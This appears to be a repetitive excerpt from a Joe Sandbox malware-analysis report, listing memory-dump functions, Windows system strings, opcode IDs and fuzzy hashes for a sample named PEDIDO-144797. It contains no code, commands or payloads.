                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID: Legacy$UEFI
                                                                                                                                          • API String ID: 2994545307-634100481
                                                                                                                                          • Opcode ID: 140ba037ded93602cd8c4f5e6b18f4e9d7ff14638a0ab312eec2665ad64f9afd
                                                                                                                                          • Instruction ID: 3777ddc1803b2c249235c5a19375f8ec9848139816eb18b993428f39dadbaa68
                                                                                                                                          • Opcode Fuzzy Hash: 140ba037ded93602cd8c4f5e6b18f4e9d7ff14638a0ab312eec2665ad64f9afd
                                                                                                                                          • Instruction Fuzzy Hash: 91614BB1A103189FEB15CFA8C940BADB7B9FF48744F50406EE949EB251EB71E940CB94
                                                                                                                                          Function 326BF640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: $$$
                                                                                                                                          • API String ID: 3446177414-233714265
                                                                                                                                          • Opcode ID: 83735b0d0050d0dc71d679cc841b3f1a487daf999c75e1288faf86e3b953556b
                                                                                                                                          • Instruction ID: 055ced4d335e0b26caea9f493d549bb51689c333e16b705bbcb411ac291c54af
                                                                                                                                          • Opcode Fuzzy Hash: 83735b0d0050d0dc71d679cc841b3f1a487daf999c75e1288faf86e3b953556b
                                                                                                                                          • Instruction Fuzzy Hash: 39610FB5A01749DFEF24CFA6C580B9DB7F6FF44708F1044A9E5056B6A0CBB0A981CB85
                                                                                                                                          Function 3273314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                          • API String ID: 0-118005554
                                                                                                                                          • Opcode ID: 3205649b301355433fdfec78ecfa4f2bbf72890c9da852d08a6d276c1986d0cb
                                                                                                                                          • Instruction ID: 113e44f3c9c3f10f0d54d61427bd067643720ae800c60c520902a61f2366a477
                                                                                                                                          • Opcode Fuzzy Hash: 3205649b301355433fdfec78ecfa4f2bbf72890c9da852d08a6d276c1986d0cb
                                                                                                                                          • Instruction Fuzzy Hash: 8F310F7520A7808BE322CF69D840B2AB3E5FF84714F080869F950CB381EBB0D945C7D2
                                                                                                                                          Function 326A06CF Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: i2$ i2
                                                                                                                                          • API String ID: 0-1694335627
                                                                                                                                          • Opcode ID: 4d1c4a79ecd989dea6837e3602cb18b85ca33378eb612280d479fb512c8fe351
                                                                                                                                          • Instruction ID: 54c79c092b0af5820c0eb0c05e2295f254126abf42afb91bf40b8655470f3542
                                                                                                                                          • Opcode Fuzzy Hash: 4d1c4a79ecd989dea6837e3602cb18b85ca33378eb612280d479fb512c8fe351
                                                                                                                                          • Instruction Fuzzy Hash: 7631E1B6A04B51ABD716DE2488A0F9B7BA5EFC43A0F014529FC05A7310EE30DC15CFA6
                                                                                                                                          Function 326D31BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: .Local\$@
                                                                                                                                          • API String ID: 0-380025441
                                                                                                                                          • Opcode ID: 6ea35c91147758af5ebb1eba0839da6100f22ef5b07b51d9c7c991ba798e8c16
                                                                                                                                          • Instruction ID: 1ff11ef75560308daf4979dc9bd200a4c51dbfa4e360142d349cb85578571cd8
                                                                                                                                          • Opcode Fuzzy Hash: 6ea35c91147758af5ebb1eba0839da6100f22ef5b07b51d9c7c991ba798e8c16
                                                                                                                                          • Instruction Fuzzy Hash: CE317CB6909345AFD711CF28C9C0B9BBBE8EFC5694F40092EF99583250D634DD19CB92
                                                                                                                                          Function 326D33D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • RtlpInitializeAssemblyStorageMap, xrefs: 3271289A
                                                                                                                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3271289F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                          • API String ID: 0-2653619699
                                                                                                                                          • Opcode ID: 9e7fd8fbd23648082037b73262519d9e1216c7ff745d9d95a3b88fc42635882d
                                                                                                                                          • Instruction ID: debb83c0358d01c9cfcafb3c3153cc1f08514f31ab1bce08fbc45318678bf857
                                                                                                                                          • Opcode Fuzzy Hash: 9e7fd8fbd23648082037b73262519d9e1216c7ff745d9d95a3b88fc42635882d
                                                                                                                                          • Instruction Fuzzy Hash: 5F110676B00218ABF71A8A488D41F5A77A9EFC8754F208029B904AB244DA74ED1087A4
                                                                                                                                          Function 326DA4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                                                                          • API String ID: 2994545307-4008356553
                                                                                                                                          • Opcode ID: c3dc681ce247d170f377c0dfafc4abb2cb70412284713d6c50249b09aa0711bf
                                                                                                                                          • Instruction ID: 1b6950da058b6c7e29828dd261218d57348b0258ede99024ed6e50084a7f2bc0
                                                                                                                                          • Opcode Fuzzy Hash: c3dc681ce247d170f377c0dfafc4abb2cb70412284713d6c50249b09aa0711bf
                                                                                                                                          • Instruction Fuzzy Hash: ED0144B2114744AFE311CF28CD00B1277E8FF40719F048A79E608C7690E730D904CB85
                                                                                                                                          Function 326AC6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: MUI
                                                                                                                                          • API String ID: 0-1339004836
                                                                                                                                          • Opcode ID: effa2496915d56f4f8914e40d6c3ed885b9371dea99c50e42d1fb73e88408a09
                                                                                                                                          • Instruction ID: 82860eb8b5c34c78bb119c6a29c15b8284c7715668de1bc45aefa45b6dfa5849
                                                                                                                                          • Opcode Fuzzy Hash: effa2496915d56f4f8914e40d6c3ed885b9371dea99c50e42d1fb73e88408a09
                                                                                                                                          • Instruction Fuzzy Hash: F2825BB9E003088FEB14CFA9C9A0BEDB7B1FF49354F108169E859AB291DB709D41CB51
                                                                                                                                          Function 326A64F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8a4cec4893b1e9640bd473d755fb770cc193d9c77b45092140fb138302c5865b
                                                                                                                                          • Instruction ID: d282c8792b5cdad49d60c569e3d0cbe3274b009fa8ce897a5a2d83b43e7a8c77
                                                                                                                                          • Opcode Fuzzy Hash: 8a4cec4893b1e9640bd473d755fb770cc193d9c77b45092140fb138302c5865b
                                                                                                                                          • Instruction Fuzzy Hash: 33E17BB4609341CFDB08CF28C0A0A5ABBE1FF89358F158A6DE99587351DB71ED05CB92
                                                                                                                                          Function 326CB1E0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @[y2@[y2
                                                                                                                                          • API String ID: 0-1467358581
                                                                                                                                          • Opcode ID: f9790bf9a1c2c53ddc38453686f2fc6a1730dc8274aefb93efb909ce78449762
                                                                                                                                          • Instruction ID: e425acdfe390f4d8e0722d902607d1668bafa585061a3482e26d950f85bd593c
                                                                                                                                          • Opcode Fuzzy Hash: f9790bf9a1c2c53ddc38453686f2fc6a1730dc8274aefb93efb909ce78449762
                                                                                                                                          • Instruction Fuzzy Hash: 9132C0B5E41229DBDF18DFA8D880BAEBBB1FF44744F14412DE805AB390EB759901CB91
                                                                                                                                          Function 326A1051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                          • Opcode ID: 7424c9ea435a100fc783c84bab229820915619b454276f7145a664ea651e89ea
                                                                                                                                          • Instruction ID: c0cf3143e60e1300e79d559852c014534a5a5715ebe879a99aa2263ec1e9994e
                                                                                                                                          • Opcode Fuzzy Hash: 7424c9ea435a100fc783c84bab229820915619b454276f7145a664ea651e89ea
                                                                                                                                          • Instruction Fuzzy Hash: A3B131B56093809FD754CF28C480A5AFBF1BF89708F1449AEF89987392D771E841CB82
                                                                                                                                          Function 326A7623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 28ce9b11f9f60438e86ffdbbc998b401bc1b473f461e921c0a810055179c7d5f
                                                                                                                                          • Instruction ID: 45ecb88d1b32d9c42fd07e75a7f8d03a4558b4245eddc2963a311890a7a8a9a3
                                                                                                                                          • Opcode Fuzzy Hash: 28ce9b11f9f60438e86ffdbbc998b401bc1b473f461e921c0a810055179c7d5f
                                                                                                                                          • Instruction Fuzzy Hash: 87615CB5A00606AFDB09CF69C490B9DFBB5BF88344F24826AD419A7310DB70AD51CF94
                                                                                                                                          Function 326A4779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                          • Opcode ID: 4c16f6ff5329a1f8ac2616eed0031a2d29c3e8044a583202a6d33b5a9beed5ec
                                                                                                                                          • Instruction ID: 4389c5b996a85d72e289d3cc2eff05498b4ca7dc690d79dc24e491648c7858c3
                                                                                                                                          • Opcode Fuzzy Hash: 4c16f6ff5329a1f8ac2616eed0031a2d29c3e8044a583202a6d33b5a9beed5ec
                                                                                                                                          • Instruction Fuzzy Hash: 2A41F5B46043818FD714CF28ECA4B2AB7E9FF81394F50452DE9418B2A1DB70DC55CB92
                                                                                                                                          Function 3269B420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                          • Opcode ID: 1076979c839169d323d4c7310af34583b31d43270cee06409bd3e7ebef788479
                                                                                                                                          • Instruction ID: 4be1182106325af302cb6dbac8de8aec5264d12757f280ca4fec503b96726b7d
                                                                                                                                          • Opcode Fuzzy Hash: 1076979c839169d323d4c7310af34583b31d43270cee06409bd3e7ebef788479
                                                                                                                                          • Instruction Fuzzy Hash: 08312F72640308AFC711CF14C880A9A77A9FF86BA4F10426EED059B2A1CF71ED42CBD4
                                                                                                                                          Function 326A56E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                          • Opcode ID: ad1a8ea8a2fd1a0dff5955eaa77803401a5aba69e63e61abef192a6bb2974b70
                                                                                                                                          • Instruction ID: a470403cfa0f512a441d7e1197c82c0c0371c8560a89107d778c94e090219fa2
                                                                                                                                          • Opcode Fuzzy Hash: ad1a8ea8a2fd1a0dff5955eaa77803401a5aba69e63e61abef192a6bb2974b70
                                                                                                                                          • Instruction Fuzzy Hash: 23319A79611A05FFEB5ACB64CAA0A59BBB6FF84354F409055EC009BA50CB71EC30CF80
                                                                                                                                          Function 3274E750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                          • Opcode ID: 92a520c8248e5f5f1e86df9e67cd81d2c418f486109d3ec1ccc69528d0747030
                                                                                                                                          • Instruction ID: ddd93218d264583bada80af1f831ce25d85ccb1b654d0dc7d7d058523900455a
                                                                                                                                          • Opcode Fuzzy Hash: 92a520c8248e5f5f1e86df9e67cd81d2c418f486109d3ec1ccc69528d0747030
                                                                                                                                          • Instruction Fuzzy Hash: 4A3189B55153028FCB10CF1AC44094ABBE6FF89364F049AAEE4889F241EB30ED05CBD2
                                                                                                                                          Function 3272A130 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                          • Opcode ID: fccf3f629ada7caea1c0ed08b32dbe636232247baa2d2a7d8c65a90a307d54a1
                                                                                                                                          • Instruction ID: 95c40f2d33adac5efb150557781f60080771e7a74637d7759bf2ed6bcd3fb488
                                                                                                                                          • Opcode Fuzzy Hash: fccf3f629ada7caea1c0ed08b32dbe636232247baa2d2a7d8c65a90a307d54a1
                                                                                                                                          • Instruction Fuzzy Hash: 89014936151259AFDF029E84C840EDA7F66FB4C7A4F058115FE186A220C636D971EB80
                                                                                                                                          Function 326992AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                          • Opcode ID: 11305e70a390b8d6f1ef367ff1460e597d369232a014b86f12d2b9a949e1a682
                                                                                                                                          • Instruction ID: 252f67c3984f83320dd4e9ea040ac7254ddc085a5799fa66cb25f828742e6634
                                                                                                                                          • Opcode Fuzzy Hash: 11305e70a390b8d6f1ef367ff1460e597d369232a014b86f12d2b9a949e1a682
                                                                                                                                          • Instruction Fuzzy Hash: 47F0FA32240700ABD7319B49CC04F8ABBEDEF80B00F040519A942931A0CAB0E90ACA64
                                                                                                                                          Function 326A965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                          • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                          • Instruction ID: 227609b54c5203c02c6b93dc19caa9b7da9e4328a0e18407fc407f569adaf439
                                                                                                                                          • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                                                                                          • Instruction Fuzzy Hash: 6A617BB6D02219ABDB15CFA8C850BDEBBF5FF84714F204559E810AB250DBB4DE05CBA0
                                                                                                                                          Function 326B02F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: #%u
                                                                                                                                          • API String ID: 0-232158463
                                                                                                                                          • Opcode ID: d82d2c36d499aa8161b95d8af916773519671ea38b2b9a044d017e71b9a2aba4
                                                                                                                                          • Instruction ID: 937ec6cb956b38fa8eca5b98644fe9dc3f564855d30b41f428827746757f8abe
                                                                                                                                          • Opcode Fuzzy Hash: d82d2c36d499aa8161b95d8af916773519671ea38b2b9a044d017e71b9a2aba4
                                                                                                                                          • Instruction Fuzzy Hash: 747179B5A0020A9FDB05CFA9C994BAEBBF8FF48704F144065E901EB251EB74E945CB64
                                                                                                                                          Function 3272F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                          • Opcode ID: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                          • Instruction ID: 59ca30bf86f8c1d5f1f0a06da9a610690b3d8265c5f87e08f486a2856ea83b7f
                                                                                                                                          • Opcode Fuzzy Hash: 9f61a4bdb5714a2bb9f6651e875168b777453bd48b0093045f8e61e884682dbf
                                                                                                                                          • Instruction Fuzzy Hash: 6151C8B2605345AFE7228F15C940F6BB7E9FF84B54F40092DFA419B290DBB4E905CB92
                                                                                                                                          Function 327686A8 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
